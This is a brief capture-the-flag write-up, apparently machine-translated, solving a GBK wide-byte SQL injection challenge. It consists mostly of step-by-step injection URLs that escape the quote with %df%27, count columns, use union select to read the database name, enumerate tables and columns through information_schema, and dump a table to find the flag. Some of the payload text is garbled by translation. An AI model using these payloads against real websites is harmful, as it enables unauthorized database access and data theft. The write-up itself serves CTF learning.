GBK Injection think byte wide injection, first of all understand the principle of broad-byte injection
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27 order by 2 #
found # is filtered out, then the use of% 23 (url encoded)
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27 order by 2%23
It determines that the table has two columns can be used: union select Get the current library
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27 union select 1, database ( ) 23%
not broke emm information library ... because there is no and 1 = 2, but also because this place may only accept a parameter
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df % 27 and 1 = 2 union select 1, database ()% 23
Current library named sae-chinalover, burst through the library name table
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27 and 1 = 2 union select 1 , group_concat ( table_name) from information_schema.tables where table_schema = 0x7361652D6368696E616C6F766572 % 23
burst news column of the table
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27 and 1 = 2 union select 1 , group_concat (column_name) from information_schema.columns where table_name = 0x6E657773% 23
stars id, title two
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27 and 1 = 2 union select 1, group_concat (id, title) from news limit 0,1% 23
Found no flag, according to the above procedure is repeated
Find the flag in ctf4 table
flag{this_is_sqli_flag}